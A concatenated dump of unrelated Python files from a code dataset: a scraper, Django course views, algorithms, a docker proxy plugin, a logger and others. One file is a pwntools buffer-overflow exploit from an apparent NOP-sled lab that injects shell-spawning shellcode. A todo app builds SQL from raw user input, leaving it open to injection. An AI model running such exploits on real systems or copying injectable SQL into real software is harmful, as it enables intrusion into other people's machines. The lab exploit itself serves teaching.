Chrome/68.0.3440.15 Safari/537.36'}\n self.start_url = \"http://tu.duowan.com/tu?offset={}\"\n self.url = []\n for i in range(10):\n url = self.start_url.format(i * 30)\n self.url.append(url)\n\n def get_xpath(self,url):#进行解析xpath\n ret = requests.get(url,self.header)\n html = etree.HTML(ret.content)\n html_content = html.xpath(\"//ul[@id='pic-list']/li/a/img/@src\")\n for html_pic in html_content:\n with open(\"png/{}\".format(html_pic[-10:]),'ab') as fp:\n ret = requests.get(html_pic)\n fp.write(ret.content)\n\n def run(self):\n for url in self.url:\n self.get_xpath(url)\n\nif __name__==\"__main__\":\n\n\n tuku = TuKu()\n tuku.run()\n","sub_path":"PycharmProjects/PythonCodes/07-爬虫/练习/爬取数据-图片.py","file_name":"爬取数据-图片.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"503424710","text":"from django.shortcuts import render, HttpResponse\nfrom django.views.generic.base import View\nfrom pure_pagination import Paginator, PageNotAnInteger\nfrom django.contrib.auth.mixins import LoginRequiredMixin # 让页面需要登陆才能看到\nfrom django.db.models import Q\n\nfrom apps.courses.models import Course, Lesson, Video, CourseResource\nfrom apps.operations.models import UserCourses, CourseComment\n\n\nclass CourseListView(View):\n def get(self, request, *args, **kwargs):\n # 从数据库中获取数据\n all_courses = Course.objects.order_by(\"-c_time\")\n courses_nums = Course.objects.all().count()\n\n # 对课程机构数据进行分页\n # 如果没有页面,则显示一页\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n\n # 每页显示的记录条数\n p = Paginator(all_courses, per_page=5, request=request)\n courses = p.page(page)\n\n return render(request, \"course_list.html\", {\n \"all_courses\": courses,\n \"courses_nums\": courses_nums,\n })\n\n\nclass CourseDetailView(View):\n def get(self, request, course_id, *args, **kwargs):\n # 从数据库中获取数据\n course = Course.objects.get(id=int(course_id))\n course.save()\n\n user_course = UserCourses.objects.filter(course=course, user=request.user)\n if user_course:\n course = Course.objects.get(id=int(course_id))\n course_resources = CourseResource.objects.filter(course=course)\n\n return render(request, \"course_lesson.html\", {\n \"course\": course,\n \"course_resources\": course_resources,\n })\n\n if not user_course:\n user_course = UserCourses(user=request.user, course=course)\n user_course.save()\n\n course.student_nums += 1\n course.save()\n\n return render(request, \"course_detail.html\", {\n \"course\": course,\n })\n\n\nclass CourseVideoView(LoginRequiredMixin, View):\n login_url = \"/login/\"\n\n def get(self, request, course_id, video_id, *args, **kwargs):\n \"\"\"\n 获取课程章节信息\n \"\"\"\n\n course = Course.objects.get(id=int(course_id))\n\n video = Video.objects.get(id=int(video_id))\n\n # 查询用户是否已经关联了该课程\n user_courses = UserCourses.objects.filter(user=request.user, course=course)\n if not user_courses:\n user_course = UserCourses(user=request.user, course=course)\n user_course.save()\n\n course.student_nums += 1\n course.save()\n\n course_resources = CourseResource.objects.filter(course=course)\n\n return render(request, \"course_play.html\", {\n \"course\": course,\n \"course_resources\": course_resources,\n \"video\": video,\n })\n\n\nclass CourseCommentsView(LoginRequiredMixin, View):\n login_url = \"/login/\"\n\n def get(self, request, course_id, *args, **kwargs):\n course = Course.objects.get(id=int(course_id))\n comments = CourseComment.objects.filter(course=course).order_by(\"-c_time\")\n\n # 查询用户是否已经关联了该课程\n user_courses = UserCourses.objects.filter(user=request.user, course=course)\n if not user_courses:\n user_course = UserCourses(user=request.user, course=course)\n user_course.save()\n\n course.student_nums += 1\n course.save()\n\n course_resources = CourseResource.objects.filter(course=course)\n\n return render(request, \"course_comment.html\", {\n \"course\": course,\n \"course_resources\": course_resources,\n \"comments\": comments\n })\n\n\nclass CourseLessonView(LoginRequiredMixin, View):\n login_url = '/login/'\n\n def get(self, request, course_id, *args, **kwargs):\n # 从数据库中获取数据\n course = Course.objects.get(id=int(course_id))\n course.click_nums += 1\n course.save()\n # 1. 用户和课程之间的关联\n # 2. 对view进行login登录的验证\n # 3. 其他课程\n\n # 查询用户是否已经关联了该课程\n user_courses = UserCourses.objects.filter(user=request.user, course=course)\n if not user_courses:\n user_course = UserCourses(user=request.user, course=course)\n user_course.save()\n\n course.student_nums += 1\n course.save()\n\n course_resources = CourseResource.objects.filter(course=course)\n\n return render(request, \"course_lesson.html\", {\n \"course\": course,\n \"course_resources\": course_resources,\n })\n\n\nclass DeleteCourseView(LoginRequiredMixin, View):\n login_url = '/login/'\n\n def get(self, request, course_id, *args, **kwargs):\n # 从数据库中获取数据\n course = Course.objects.filter(id=int(course_id))\n user_course = UserCourses.objects.filter(user_id=request.user.id, course=course_id)\n user_course.delete()\n\n my_courses = UserCourses.objects.filter(user=request.user)\n return render(request, \"user_courses.html\", {\n # \"my_courses\":my_courses,\n \"my_courses\": my_courses\n })\n","sub_path":"zkonline/apps/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"456980127","text":"\"\"\"\nhttps://www.careercup.com/question?id=16759664\n\nYou have k lists of sorted integers. Find the smallest range that includes at least one number from each of the k lists.\n\nFor example,\nList 1: [4, 10, 15, 24, 26]\nList 2: [0, 9, 12, 20]\nList 3: [5, 18, 22, 30]\n\nThe smallest range here would be [20, 24] as it contains 24 from list 1, 20 from list 2, and 22 from list 3.\n\n\n\"\"\"\n\nimport heapq\n\n\ndef smallest_range_in_K_lists(sequences):\n min_heap = []\n num_elements = 0\n for i, numbers in enumerate(sequences):\n min_heap.append((numbers[0], i, 0))\n num_elements += len(numbers)\n\n heapq.heapify(min_heap)\n left_bound, right_bound = min(min_heap)[0], max(min_heap)[0]\n for _ in range(num_elements):\n cur_left, cur_right = min(min_heap)[0], max(min_heap)[0]\n current_range = cur_right - cur_left\n\n if right_bound - left_bound > current_range:\n right_bound, left_bound = cur_right, cur_left\n\n _, i, j = heapq.heappop(min_heap)\n\n if j + 1 >= len(sequences[i]):\n break\n\n heapq.heappush(min_heap, (sequences[i][j + 1], i, j + 1))\n\n return [left_bound, right_bound]\n\n\nif __name__ == '__main__':\n sequences = [[4, 10, 15, 24, 26],\n [0, 9, 12, 20],\n [5, 18, 22, 30]]\n\n print(smallest_range_in_K_lists(sequences))\n\n","sub_path":"Problems/companies/Google/Interviews/Onsite interview/Find smallest range in K sorted lists.py","file_name":"Find smallest range in K sorted lists.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"180101969","text":"import dork_compose.plugin\nfrom compose.cli.docker_client import docker_client\nfrom dork_compose.helpers import notdefault, tru\nimport os\nimport glob\nimport urlparse\nimport pkg_resources\n\n\nclass Plugin(dork_compose.plugin.Plugin):\n\n def __init__(self, env, name):\n dork_compose.plugin.Plugin.__init__(self, env, name)\n self.auth = self.collect_auth_files()\n\n def environment(self):\n return {\n 'DOCKER_SOCK': self.docker_sock,\n 'DORK_PROXY_AUTH_DIR': self.auth_dir,\n 'DORK_PROXY_CERTS_DIR': self.auth_dir,\n }\n\n @property\n def auxiliary_project(self):\n return pkg_resources.resource_filename('dork_compose', 'auxiliary/proxy')\n\n def service_domain(self, service=None):\n return '--'.join(filter(tru, [\n service,\n notdefault(self.project),\n notdefault(self.instance)\n ])) + '.' + self.proxy_domain\n\n def info(self, project):\n info = {}\n auth = self.collect_auth_files()\n for service in project.services:\n if 'environment' in service.options and 'VIRTUAL_HOST' in service.options['environment']:\n key = '\"%s\" url' % service.name\n info[key] = service.options['environment'].get('VIRTUAL_PROTO', 'http') + '://' + service.options['environment']['VIRTUAL_HOST']\n if '.auth' in auth or '.auth.%s' % service.name in auth:\n info[key] += ' (password protected)'\n return info\n\n @property\n def auth_dir(self):\n return os.path.expanduser(self.env.get('DORK_PROXY_AUTH_DIR', '%s/auth' % self.datadir))\n\n @property\n def certs_dir(self):\n return os.path.expanduser(self.env.get('DORK_PROXY_AUTH_DIR', '%s/certs' % self.datadir))\n\n @property\n def docker_sock(self):\n result = urlparse.urlparse(self.env.get('DOCKER_HOST', 'unix:///var/run/docker.sock'))\n if result.scheme != 'unix':\n raise EnvironmentError('Dork proxy works with docker socket api only.')\n return result.path\n\n @property\n def proxy_domain(self):\n return self.env.get('DORK_PROXY_DOMAIN', '127.0.0.1.xip.io')\n\n def reload_proxy(self):\n client = docker_client(self.env)\n containers = client.containers(all=True, filters={\n 'label': 'org.iamdork.proxy'\n })\n\n for container in containers:\n ex = client.exec_create(container, 'nginx -s reload')\n client.exec_start(ex)\n\n def preprocess_config(self, config):\n for service in config.services:\n if 'ports' in service:\n for index, port in enumerate(service['ports']):\n if isinstance(port, basestring):\n (external, internal) = port.split(':')\n if external and internal:\n domain = self.service_domain() if external == '80' or external == '443' else self.service_domain(service['name'])\n if 'environment' not in service:\n service['environment'] = {}\n service['environment']['VIRTUAL_HOST'] = domain\n if 'labels' not in service:\n service['labels'] = {}\n if external == '443':\n service['environment']['VIRTUAL_PROTO'] = 'https'\n service['environment']['VIRTUAL_PORT'] = int(internal)\n del service['ports'][index]\n\n def collect_auth_files(self):\n files = {}\n path = filter(len, self.basedir.split('/'))\n current = ''\n while len(path):\n current = current + '/' + path.pop(0)\n auth = '%s/.auth' % current\n if os.path.isfile(auth):\n if '.auth' not in files:\n files['.auth'] = []\n with open(auth) as f:\n files['.auth'].append(f.read())\n for file in glob.glob('%s/.auth.*' % current):\n filename = os.path.basename(file)\n if filename not in files:\n files[filename] = []\n with open(file) as f:\n files[filename].append(f.read())\n\n return files\n\n def initializing(self, project, service_names=None):\n for service in project.get_services():\n if self.auth_dir and 'environment' in service.options and 'VIRTUAL_HOST' in service.options['environment']:\n lines = []\n if '.auth' in self.auth:\n lines.extend(self.auth['.auth'])\n if '.auth.%s' % service.name in self.auth:\n lines.extend(self.auth['.auth.%s' % service.name])\n authfile = '%s/%s' % (self.auth_dir, service.options['environment']['VIRTUAL_HOST'])\n if lines:\n with open(authfile, mode='w+') as f:\n f.writelines(lines)\n elif os.path.exists(authfile):\n os.remove(authfile)\n","sub_path":"dork_compose/plugins/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":5102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"229217722","text":"from tkinter import *\nimport sqlite3 as sql\nimport string\nimport time\n\n\nclass App:\n def __init__(self,master):\n def listtodo():\n db = sql.connect(\"todorecord.sqlite\")\n cursor = db.cursor()\n selecttodo = cursor.execute(\"select * from todo\")\n db.commit()\n for todo in selecttodo:\n data = todo\n todolist.insert(0, str(todo[0]) + \" - \" + str(todo[1]))\n listtodo()\n\n\nwindow = Tk()\nwindow.title(\"TODO List!\")\n\nwindow.geometry(\"405x505\")\nwindow.resizable(False,False)\n\ntodolist = Listbox(width=50, height=30)\ntodolist.grid(row=0, column=0, columnspan=2, sticky=\"we\")\n\nadd = Button(text=\"Add\", command = lambda: addfunc(addtextbox.get()))\nadd.grid(row=1, column=0, sticky=\"we\")\ndelete = Button(text=\"Delete\", command = lambda: deletefunc(todolist))\ndelete.grid(row=1, column=1, sticky=\"we\")\naddtextbox = Entry()\naddtextbox.grid(row=2, column=0,columnspan=2, sticky=\"we\")\naddtextbox.focus()\n\n\ndef listtodo():\n db = sql.connect(\"todorecord.sqlite\")\n cursor = db.cursor()\n selecttodo = cursor.execute(\"select * from todo\")\n db.commit()\n for todo in selecttodo:\n data = todo\n todolist.insert(0, str(todo[0]) + \" - \" + str(todo[1]))\n\n\ndef addfunc(i):\n todolist.delete(0, END)\n addtextbox.delete(0, 'end')\n addtextbox.focus()\n db = sql.connect(\"todorecord.sqlite\")\n cursor = db.cursor()\n if i:\n addtodo = cursor.execute(\"INSERT INTO todo (todo, date) values ('\"+i+\"','\"+str(time.time())+\"')\")\n db.commit()\n if addtodo:\n print(\"Added!\")\n else:\n print(\"Something wrong!\")\n db.close()\n listtodo()\n\ndef deletefunc(l):\n selection = l.curselection()\n if selection:\n idfirst = str(l.get(selection[0]))\n id = idfirst.split(\" \")\n todoid = id[0]\n l.delete(selection[0])\n db = sql.connect(\"todorecord.sqlite\")\n cursor = db.cursor()\n deletetodo = cursor.execute(\"delete from todo where id = '\"+todoid+\"'\")\n db.commit()\n else:\n print(\"Select an item in the list!\")\n\n\n\napp = App(window)\nmainloop()\n\n","sub_path":"todolist.py","file_name":"todolist.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"610980839","text":"#!/usr/bin/env python\nfrom pwn import *\n\ncontext.binary = \"./vuln\"\n\naddr = 0x7fffffffcce0 + 500\n# 0x7fffffffcdc0\noffset = 0x800\n\nio = process(\"./vuln\")\n# gdb.attach(io)\n\n# execve(\"/bin/sh\", {\"/bin/sh\", NULL}, NULL);\nprint(shellcraft.sh())\nshellcode = asm(\"NOP\") * 1500 + asm(shellcraft.sh())\nprint(len(shellcode))\n\npayload = shellcode\npayload += (offset + 8 - len(shellcode)) * b'A'\npayload += pack(addr)\n\nio.send(payload)\nio.interactive()\n\n\n\n","sub_path":"shellcodes-advanced/activities/02-tutorial-nop-sleds/src/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"114157659","text":"#!/usr/bin/env python3\n#\n# Copyright 2019-2020 PSB\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport cobra\n\ngecko = cobra.io.read_sbml_model(\"ec_model_2019_06_25_output/iJO1366_2019_06_25_GECKO.xml\")\nanalogon = cobra.io.read_sbml_model(\"ec_model_2019_06_25_output/iJO1366_sMOMENT_2019_06_25_GECKO_ANALOGON.xml\")\n\ngecko_reactions_with_arm = []\nfor reaction in gecko.reactions:\n if \"for gene rule\" in reaction.name:\n continue\n metabolite_ids = [x.id for x in reaction.metabolites.keys() if x.id.startswith(\"im_\")]\n if len(metabolite_ids) == 1:\n gecko_reactions_with_arm.append(reaction.id.split(\"_TG_\")[0])\n\nanalogon_reactions_with_arm = []\nfor reaction in analogon.reactions:\n if \"Arm reaction\" in reaction.name:\n continue\n metabolite_ids = [x.id for x in reaction.metabolites.keys() if x.id.startswith(\"armm_\")]\n if len(metabolite_ids) == 1:\n analogon_reactions_with_arm.append(reaction.id.split(\"_GPRSPLIT\")[0])\n\ngecko_reactions_with_arm = set(gecko_reactions_with_arm)\nanalogon_reactions_with_arm = set(analogon_reactions_with_arm)\n\nprint(\"===STRUCTURAL COMPARISON OF ORIGINAL GECKO AND SMOMENT-BASED GECKO-ANALOGOUS MODEL===\")\nprint(\"Number of arm reactions - original GECKO:\", len(gecko_reactions_with_arm))\nprint(\"Number of arm reactions - sMOMENT GECKO analogon:\", len(analogon_reactions_with_arm))\ndifference = analogon_reactions_with_arm - gecko_reactions_with_arm\nprint(\"---\")\nprint(\"Number of reactions - original GECKO: \", len(gecko.reactions))\nprint(\"Number of reactions - sMOMENT GECKO analogon: \", len(analogon.reactions))\nprint(\"---\")\nprint(\"Number of metabolites - original GECKO: \", len(gecko.metabolites))\nprint(\"Number of metabolites - sMOMENT GECKO analogon: \", len(analogon.metabolites))\n","sub_path":"autopacmen/compare_gecko_and_gecko_analogon.py","file_name":"compare_gecko_and_gecko_analogon.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"277769367","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n# le imagem quad\nimg = cv2.imread('quad.bmp', 0)\ndft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)\ndft_shift = np.fft.fftshift(dft)\n\nmagnitude_spectrum = 20 * np.log(cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))\nrows, cols = img.shape\ncrow, ccol = int(rows / 2), int(cols / 2)\nmask = np.zeros((rows, cols, 2), np.uint8)\nnum = 10\nmask[crow - num:crow + num, ccol - num:ccol + num] = 1\nfshift = dft_shift * mask\nf_ishift = np.fft.ifftshift(fshift)\nimg_back = cv2.idft(f_ishift)\nimg_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])\nplt.subplot(121), plt.imshow(img, cmap='gray')\nplt.title('Input Image'), plt.xticks([]), plt.yticks([])\nplt.subplot(122), plt.imshow(img_back, cmap='gray')\nplt.title('Magnitude Spectrum'), plt.xticks([]), plt.yticks([])\n\nplt.plot(img_back[50])\n\n\nplt.show()\n","sub_path":"lab_2/ex_4.py","file_name":"ex_4.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"582979404","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThe code is mostly the result of Frédéric Mantegazza with only slight\nmodifications to allow for my logging structure\n\nModule purpose\n--------------------------------------------\n\nLogging\n\nImplements\n--------------------------------------------\n - DefaultFormatter\n - ColorFormatter\n - Logger\n\n:author: Frédéric Mantegazza and Colin Kennedy\n.. @copyright: (C) 2007-2011 Frédéric Mantegazza\n.. @license: CeCILL\n\"\"\"\n\n__revision__ = \"$Id$\"\n\n# IMPORT STANDARD LIBRARIES\nimport logging\nimport logging.handlers\nimport StringIO\nimport traceback\nimport os.path\n\n# IMPORT THIRD PARTY LIBRARIES\nfrom commons.unseenformatter import UnseenFormatter\nfrom logger.common import config\nfrom logger.common.loggingFormatter import DefaultFormatter, ColorFormatter, \\\n SpaceFormatter, SpaceColorFormatter\nfrom pysix import six # Python 2.x/3.x string types checking\n\nlogger = None\n\n# IMPORT LOCAL LIBRARIES\nfrom dictlogger import LoggerDictBase, \\\n LOGGER_MESSAGE_CONFIG, \\\n RE_LOGGER_KEY_MATCH\n\nclass LoggerObject(LoggerDictBase):\n \"\"\"\n Logger object that is instantiated by the factory method\n \"\"\"\n def __init__(self, defaultStreamHandler, defaultFileHandler):\n \"\"\"\n Init object\n\n Args:\n DefaultStreamHandler (bool): If enabled, the logger will print\n to stdout\n DefaultFileHandler (bool): If enabled, a rotating file handler\n will be created in wherever is specified\n in config.TMP_DIR\n \"\"\"\n super(LoggerDictBase, self).__init__() # takes no arguments\n super(LoggerObject, self).__init__(defaultStreamHandler, defaultFileHandler)\n logging.TRACE = logging.DEBUG - 5\n logging.EXCEPTION = logging.ERROR + 5\n logging.raiseExceptions = 0\n logging.addLevelName(logging.TRACE, \"TRACE\")\n logging.addLevelName(logging.EXCEPTION, \"EXCEPTION\")\n\n # FormattersTypeError: must be type, not classobj\n\n #defaultFormatter = DefaultFormatter(config.LOGGER_FORMAT)\n spaceFormatter = SpaceFormatter(config.LOGGER_FORMAT)\n #colorFormatter = ColorFormatter(config.LOGGER_FORMAT)\n spaceColorFormatter = SpaceColorFormatter(config.LOGGER_FORMAT)\n\n # Logger\n self.__logger = logging.getLogger('POP2')\n self.__logger.setLevel(logging.TRACE)\n\n # Handlers\n if defaultStreamHandler:\n stdoutStreamHandler = logging.StreamHandler()\n #stdoutStreamHandler.setFormatter(colorFormatter)\n stdoutStreamHandler.setFormatter(spaceColorFormatter)\n self.__logger.addHandler(stdoutStreamHandler)\n if defaultFileHandler:\n loggerFilename = os.path.join(config.TMP_DIR, config.LOGGER_FILENAME)\n fileHandler = logging.handlers.RotatingFileHandler(loggerFilename, 'w',\n config.LOGGER_MAX_BYTES,\n config.LOGGER_BACKUP_COUNT)\n fileHandler.setFormatter(spaceFormatter)\n self.__logger.addHandler(fileHandler)\n\n def addStreamHandler(self, stream, formatter=DefaultFormatter):\n \"\"\"\n Add a new stream handler.\n Can be used to register a new GUI handler.\n\n Args:\n stream (???): open stream where to write logs\n formatter (L{DefaultFormatter}): Associated\n formatter\n \"\"\"\n handler = logging.StreamHandler(stream)\n handler.setFormatter(formatter(config.LOGGER_FORMAT))\n self.__logger.addHandler(handler)\n # end addStreamHandler\n\n def get_value(self, key, args, kwds):\n \"\"\"\n Gets whatever value in the dictionary using a key and then uses it to\n get the item from kwds. This logger expects strings as keywords. If it\n isn't, the value has to be passed to a formatter that can safely handle\n the exception.\n\n Args:\n key (str or other): The key to get the item of\n args (other): Additional arguments to pass to\n string.Formatter.get_value\n (see it's documentation for more details)\n kwds (dict): The dictionary to retrieve items from, using key\n\n Returns:\n (str or any): The the item(s) from kwds. It will typically be a\n string but could theoretically be anything\n \"\"\"\n if isinstance(key, str):\n try:\n return kwds[key]\n except KeyError:\n return key\n else:\n fmt.get_value(key, args, kwds)\n # end get_value\n\n def setLevel(self, level):\n \"\"\"\n Change logging level.\n\n Args:\n level (str): new level, in ('trace', 'debug', 'info', 'warning',\n 'error', 'exception', 'critical')\n \"\"\"\n loggerLevels = ('trace', 'debug', 'info', 'warning', 'error', 'exception', 'critical')\n if level not in loggerLevels:\n raise ValueError(\"Logger level must be in %s\" % loggerLevels)\n levels = {'trace': logging.TRACE,\n 'debug': logging.DEBUG,\n 'info': logging.INFO,\n 'warning': logging.WARNING,\n 'error': logging.ERROR,\n 'exception': logging.EXCEPTION,\n 'critical': logging.CRITICAL}\n self.__logger.setLevel(levels[level])\n # end setLevel\n\n def trace(self, pos, format=None, *args, **kwargs):\n \"\"\"\n Logs a message with level TRACE.\n\n Args:\n pos (str): Either a string to use to send a message to the\n StreamHandler or a key that's used to access a\n dictionary, passed through format\n format (dict): An optional dictionary which can contain strings as\n \"key\"/\"item\" pairs, which would be used to replace\n formatted text that's passed from self.__getitem__\n args (any): Any additional variables to pass to the logger instance\n kwargs (any): Any additional keywords to pass to the logger instance\n \"\"\"\n if format is None:\n message = self.__getitem__(pos)\n else:\n message = self.__getitem__(pos)\n message = str(message)\n fmt = UnseenFormatter()\n message = fmt.format(message, **format)\n\n if isinstance(pos, six.string_types):\n # override previous if pos is a regular logging string\n message = pos\n\n self.__logger.log(logging.TRACE, message, *args, **kwargs)\n\n def debug(self, pos, format=None, *args, **kwargs):\n \"\"\"\n Logs a message with level DEBUG.\n\n Args:\n pos (str): Either a string to use to send a message to the\n StreamHandler or a key that's used to access a\n dictionary, passed through format\n format (dict): An optional dictionary which can contain strings as\n \"key\"/\"item\" pairs, which would be used to replace\n formatted text that's passed from self.__getitem__\n args (any): Any additional variables to pass to the logger instance\n kwargs (any): Any additional keywords to pass to the logger instance\n \"\"\"\n if format is None:\n message = self.__getitem__(pos)\n else:\n message = self.__getitem__(pos)\n message = str(message)\n fmt = UnseenFormatter()\n message = fmt.format(message, **format)\n\n if isinstance(pos, six.string_types):\n # override previous if pos is a regular logging string\n message = pos\n\n self.__logger.debug(message, *args, **kwargs)\n # end debug\n\n def info(self, pos, format=None, *args, **kwargs):\n \"\"\"\n Logs a message with level INFO.\n\n Args:\n pos (str): Either a string to use to send a message to the\n StreamHandler or a key that's used to access a\n dictionary, passed through format\n format (dict): An optional dictionary which can contain strings as\n \"key\"/\"item\" pairs, which would be used to replace\n formatted text that's passed from self.__getitem__\n args (any): Any additional variables to pass to the logger instance\n kwargs (any): Any additional keywords to pass to the logger instance\n \"\"\"\n\n if format is None:\n message = self.__getitem__(pos)\n else:\n message = self.__getitem__(pos)\n message = str(message)\n fmt = UnseenFormatter()\n message = fmt.format(message, **format)\n\n if isinstance(pos, six.string_types):\n # override previous if pos is a regular logging string\n message = pos\n\n self.__logger.info(message, *args, **kwargs)\n # end info\n\n def warning(self, pos, format=None, *args, **kwargs):\n \"\"\"\n Logs a message with level WARNING.\n\n Args:\n pos (str): Either a string to use to send a message to the\n StreamHandler or a key that's used to access a\n dictionary, passed through format\n format (dict): An optional dictionary which can contain strings as\n \"key\"/\"item\" pairs, which would be used to replace\n formatted text that's passed from self.__getitem__\n args (any): Any additional variables to pass to the logger instance\n kwargs (any): Any additional keywords to pass to the logger instance\n \"\"\"\n if format is None:\n message = self.__getitem__(pos)\n else:\n message = self.__getitem__(pos)\n message = str(message)\n fmt = UnseenFormatter()\n message = fmt.format(message, **format)\n\n if isinstance(pos, six.string_types):\n # override previous if pos is a regular logging string\n message = pos\n\n self.__logger.warning(message, *args, **kwargs)\n # end warning\n\n def error(self, pos, format=None, *args, **kwargs):\n \"\"\"\n Logs a message with level ERROR.\n\n Args:\n pos (str): Either a string to use to send a message to the\n StreamHandler or a key that's used to access a\n dictionary, passed through format\n format (dict): An optional dictionary which can contain strings as\n \"key\"/\"item\" pairs, which would be used to replace\n formatted text that's passed from self.__getitem__\n args (any): Any additional variables to pass to the logger instance\n kwargs (any): Any additional keywords to pass to the logger instance\n \"\"\"\n if format is None:\n message = self.__getitem__(pos)\n else:\n message = self.__getitem__(pos)\n message = str(message)\n fmt = UnseenFormatter()\n message = fmt.format(message, **format)\n\n if isinstance(pos, six.string_types):\n # override previous if pos is a regular logging string\n message = pos\n\n self.__logger.error(message, *args, **kwargs)\n # end error\n\n def critical(self, pos, format=None, *args, **kwargs):\n \"\"\"\n Logs a message with level CRITICAL.\n\n Args:\n pos (str): Either a string to use to send a message to the\n StreamHandler or a key that's used to access a\n dictionary, passed through format\n format (dict): An optional dictionary which can contain strings as\n \"key\"/\"item\" pairs, which would be used to replace\n formatted text that's passed from self.__getitem__\n args (any): Any additional variables to pass to the logger instance\n kwargs (any): Any additional keywords to pass to the logger instance\n \"\"\"\n if format is None:\n message = self.__getitem__(pos)\n else:\n message = self.__getitem__(pos)\n message = str(message)\n fmt = UnseenFormatter()\n message = fmt.format(message, **format)\n\n if isinstance(pos, six.string_types):\n # override previous if pos is a regular logging string\n message = pos\n\n self.__logger.critical(message, *args, **kwargs)\n # end critical\n\n def exception(self, pos, debug=False, format=None, *args, **kwargs):\n \"\"\"\n Logs a message within an exception.\n\n Args:\n pos (str): Either a string to use to send a message to the\n StreamHandler or a key that's used to access a\n dictionary, passed through format\n debug (bool): Flag to log exception on DEBUG level instead of EXCEPTION one\n format (dict): An optional dictionary which can contain strings as\n \"key\"/\"item\" pairs, which would be used to replace\n formatted text that's passed from self.__getitem__\n args (any): Any additional variables to pass to the logger instance\n kwargs (any): Any additional keywords to pass to the logger instance\n \"\"\"\n kwargs['exc_info'] = True\n message = self.__getitem__(pos)\n message = str(message)\n fmt = UnseenFormatter()\n message = fmt.format(message, **format)\n\n if debug:\n if isinstance(pos, six.string_types):\n message = pos\n\n self.debug(message, *args, **kwargs)\n else:\n if isinstance(pos, six.string_types):\n message = pos\n\n self.log(logging.EXCEPTION, message, *args, **kwargs)\n\n def log(self, level, pos, message, *args, **kwargs):\n \"\"\"\n Logs a message with given level.\n\n Args:\n level (int): log level to use\n pos (str): Either a string to use to send a message to the\n StreamHandler or a key that's used to access a\n dictionary, passed through format\n message (str): Message to log\n args (any): Any additional variables to pass to the logger instance\n kwargs (any): Any additional keywords to pass to the logger instance\n \"\"\"\n message = self.__getitem__(pos)\n message = str(message)\n fmt = UnseenFormatter()\n message = fmt.format(message, **format)\n\n if isinstance(pos, six.string_types):\n # override previous if pos is a regular logging string\n message = pos\n\n self.__logger.log(level, message, *args, **kwargs)\n # end log\n\n def getTraceback(self):\n \"\"\"\n Return the complete traceback. Should be called in an except statement.\n\n Returns:\n str: The traceback from within the exception block\n \"\"\"\n tracebackString = StringIO.StringIO()\n traceback.print_exc(file=tracebackString)\n message = tracebackString.getvalue().strip()\n tracebackString.close()\n return message\n # end getTraceback\n\n def shutdown(self):\n \"\"\"\n Shutdown the logging service.\n \"\"\"\n logging.shutdown()\n # end shutdown\n\n# Logger factory\ndef Logger(defaultStreamHandler=True, defaultFileHandler=True):\n \"\"\"\n The logger factory that creates a global logger and ensures that only one\n instance of the logger class exists at a time\n\n Args:\n defaultStreamHandler (bool): When enabled, sets the StreamHandler to\n stdout\n defaultFileHandler (bool): When enabled, sets local files to save in\n config.TMP_DIR\n\n Returns:\n : A global logger instance\n \"\"\"\n global logger\n if logger is None:\n logger = LoggerObject(defaultStreamHandler, defaultFileHandler)\n\n return logger\n# end Logger\n\n\ndef init_logger():\n \"\"\"\n Initialized a basic logger\n \"\"\"\n logger = Logger(RE_LOGGER_KEY_MATCH, LOGGER_MESSAGE_CONFIG)\n return logger\n# end init_logger\n\n\ndef test_logger():\n \"\"\"\n quick test\n \"\"\"\n dictNew = LoggerDictBase(RE_LOGGER_KEY_MATCH, LOGGER_MESSAGE_CONFIG)\n\n logger = Logger(RE_LOGGER_KEY_MATCH, LOGGER_MESSAGE_CONFIG)\n # logger.debug(['AIE3000', \"Match_True\"], {'name':'Joe'})\n logger.debug(['AIE5605', \"Match_True\"], {'name':'Joe'})\n# end test_logger\n\nif __name__ == \"__main__\":\n test_logger()\n","sub_path":"Pipeline/the_LATEST/sys_PY/py_MODULES/logger/common/loggingServices.py","file_name":"loggingServices.py","file_ext":"py","file_size_in_byte":17012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"258826763","text":"# Copyright 2017 SAP SE\n#\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom 